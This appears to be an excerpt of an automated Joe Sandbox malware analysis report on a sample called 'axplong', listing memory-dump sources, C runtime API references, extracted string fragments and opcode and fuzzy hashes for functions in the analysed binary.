                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                          • String ID:
                          • API String ID: 57040152-0
                          • Opcode ID: 081944a9f13cf8815e9191d87f9d2b9f26459157d4a7b3adc6e95e73e4b9c832
                          • Instruction ID: 971dba9e9cfaa69e05bd703cf11af34aca28655ee7209b92aefafd3a3f5607f6
                          • Opcode Fuzzy Hash: 081944a9f13cf8815e9191d87f9d2b9f26459157d4a7b3adc6e95e73e4b9c832
                          • Instruction Fuzzy Hash: 0FA1D0B0A206069FDB11DF74C944B6AB7B8FF15320F50816DE819D7681EB31EA68CB91
                          APIs
                          • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0027795C
                          • __Cnd_destroy_in_situ.LIBCPMT ref: 00277968
                          • __Mtx_destroy_in_situ.LIBCPMT ref: 00277971
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                          • String ID: 'k'd+,$@y'$d+,
                          • API String ID: 4078500453-2368335016
                          • Opcode ID: ac1e791b4c59f83947b5a6c93fa7eadeb8a5fbc3a2889d20e6c904322144c52a
                          • Instruction ID: 374eac08bd8a581c3066eb34f711cb83e8f1a9ae076c0070070ac064eb93b578
                          • Opcode Fuzzy Hash: ac1e791b4c59f83947b5a6c93fa7eadeb8a5fbc3a2889d20e6c904322144c52a
                          • Instruction Fuzzy Hash: B531E5B29247059FD720DF64D845B66B7E8EF14310F104A3EE64DC7241E771EA64CBA1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: _wcsrchr
                          • String ID: .bat$.cmd$.com$.exe
                          • API String ID: 1752292252-4019086052
                          • Opcode ID: 1a33a2fb1b44e1e9a035e745f62922f48edbc7f076e30b0c44f88e751962f61c
                          • Instruction ID: ed1f7ad0e04541055b4a9cc29d3d35b4770bbffb823c8360d2a746843a0b5635
                          • Opcode Fuzzy Hash: 1a33a2fb1b44e1e9a035e745f62922f48edbc7f076e30b0c44f88e751962f61c
                          • Instruction Fuzzy Hash: 6501C827638717276E196819AD0277B17989B83BB4B15002EF948F72C1DE44EC2245A0
                          APIs
                          • ___std_exception_copy.LIBVCRUNTIME ref: 00262806
                          • ___std_exception_destroy.LIBVCRUNTIME ref: 002628A0
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: ___std_exception_copy___std_exception_destroy
                          • String ID: P#&$P#&
                          • API String ID: 2970364248-1581809584
                          • Opcode ID: 040fa1507b577ed33166f2695ab4db50dad4a1f7f24f6327c0472910b3b768ec
                          • Instruction ID: 9e396ec5eec2db3313032e43a589479dfc2f52481bd194df459519ddc02a1553
                          • Opcode Fuzzy Hash: 040fa1507b577ed33166f2695ab4db50dad4a1f7f24f6327c0472910b3b768ec
                          • Instruction Fuzzy Hash: C4718F71E10208DBDF05CFA8C885BDEFBB5EF59310F14812DE805A7285EB74A994CBA5
                          APIs
                          • ___std_exception_copy.LIBVCRUNTIME ref: 00262B23
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: ___std_exception_copy
                          • String ID: P#&$P#&$This function cannot be called on a default constructed task
                          • API String ID: 2659868963-4226515001
                          • Opcode ID: 54a5f7545218312a5e6273e153e89e5ee1e8c57dc94df0c32c6e714a98741d07
                          • Instruction ID: 7183134d4df9fa38b8b390aa467b7a8365ffdd37c20b568516c04d6af21b1295
                          • Opcode Fuzzy Hash: 54a5f7545218312a5e6273e153e89e5ee1e8c57dc94df0c32c6e714a98741d07
                          • Instruction Fuzzy Hash: 0CF0967092030C9BC714DFA8AC419DEF7EDDF15300F5081AEF94997641EFB0AA688B95
                          APIs
                          • ___std_exception_copy.LIBVCRUNTIME ref: 0026247E
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: ___std_exception_copy
                          • String ID: 'k'd+,$P#&$P#&
                          • API String ID: 2659868963-1911315485
                          • Opcode ID: 9e15a440c2581a008a51bd1d798555d2d7715963688ccbc348e184063255667c
                          • Instruction ID: 6c0736298f26b38d081345ec0fce9727c9f3f1efaafad36f4853eeb97e01ed1a
                          • Opcode Fuzzy Hash: 9e15a440c2581a008a51bd1d798555d2d7715963688ccbc348e184063255667c
                          • Instruction Fuzzy Hash: 4BF0E5B5D2020C67CB14EFE4D841DCAB3ACDE15340B008A25F754E7600F770FA648B91
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: _strrchr
                          • String ID:
                          • API String ID: 3213747228-0
                          • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                          • Instruction ID: a99f6273e595e8a2d2eeedc1244b9bea30296365cbe8a9b577231b9bc6af6f84
                          • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                          • Instruction Fuzzy Hash: 19B136329202869FDF15CF28C891BBEBFE5EF55344F3481AAE849AB341D6349D51CB60
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xtime_diff_to_millis2_xtime_get
                          • String ID:
                          • API String ID: 531285432-0
                          • Opcode ID: 1ad782131b3556fb506515a2ed7054540f8e06b041be98d00b79e1971233b754
                          • Instruction ID: 99c07325067f639e2d85b2fe38ab2f37cbfb93a808403b5cd8569c214c12146c
                          • Opcode Fuzzy Hash: 1ad782131b3556fb506515a2ed7054540f8e06b041be98d00b79e1971233b754
                          • Instruction Fuzzy Hash: 68217F71A10119AFDF11EFA4DC869AEBBB8EF08314F108029F905B7250DB30AD118FA1
                          APIs
                          • __Mtx_init_in_situ.LIBCPMT ref: 0027726C
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: Mtx_init_in_situ
                          • String ID: @.&$`z'
                          • API String ID: 3366076730-3172844475
                          • Opcode ID: 7c0dfd483125dcdc7db5e2056c386cce9370c94d58235687041da159042cbc26
                          • Instruction ID: e0ba0cb872b41eba591061df9bbbee4ebd9bcf0da90bb4ebb0d8fce8c76dd37b
                          • Opcode Fuzzy Hash: 7c0dfd483125dcdc7db5e2056c386cce9370c94d58235687041da159042cbc26
                          • Instruction Fuzzy Hash: 6DA137B0E116158FDB21CFA8C884B9EBBF1AF48710F18819AE819AB351E7759D11CF80
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: ___free_lconv_mon
                          • String ID: 8",$`',
                          • API String ID: 3903695350-3341778876
                          • Opcode ID: 97ca5d0b7bebd0d840d3dbdca9a1e68ec77586f01fd3de5d89766b44cc3cce3b
                          • Instruction ID: 2692389c101986a0ecfaf3bff45572626a92258ea9e269ba4c81f7b8378d2b19
                          • Opcode Fuzzy Hash: 97ca5d0b7bebd0d840d3dbdca9a1e68ec77586f01fd3de5d89766b44cc3cce3b
                          • Instruction Fuzzy Hash: C2316D31A203069FEFA1AF78DA45B5A73E9AF00310F10446AE84ADB191DF35FCA0CB55
                          APIs
                          • __Mtx_init_in_situ.LIBCPMT ref: 00263962
                          • __Mtx_init_in_situ.LIBCPMT ref: 002639A1
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: Mtx_init_in_situ
                          • String ID: pB&
                          • API String ID: 3366076730-3153205560
                          • Opcode ID: 3599a7a26da6eaed7168d5ac0cff5651744fadcfe72d8b2a218e11714abd3b1d
                          • Instruction ID: 2abf91325e9006c3857af770035fcf62a17bb311f89428bb5fe3f1e73287191a
                          • Opcode Fuzzy Hash: 3599a7a26da6eaed7168d5ac0cff5651744fadcfe72d8b2a218e11714abd3b1d
                          • Instruction Fuzzy Hash: 974124B0501B068FD720CF68C588B5ABBF0FF44315F20861DE86A8B341E7B5AA65CF80
                          APIs
                          • ___std_exception_copy.LIBVCRUNTIME ref: 00262552
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: ___std_exception_copy
                          • String ID: P#&$P#&
                          • API String ID: 2659868963-1581809584
                          • Opcode ID: 263235e4208fc824a7953d2d3d17c0958b006c83512dc303a63e231b61801d62
                          • Instruction ID: ca4d0ff054385051adc946c64b99152da92c4b36baf14466e95a084b2b35333c
                          • Opcode Fuzzy Hash: 263235e4208fc824a7953d2d3d17c0958b006c83512dc303a63e231b61801d62
                          • Instruction Fuzzy Hash: 7DF08271D2020D9BCB15DFA8D8419CEBBF8AF55300F1082AEE44567200EA706A648F99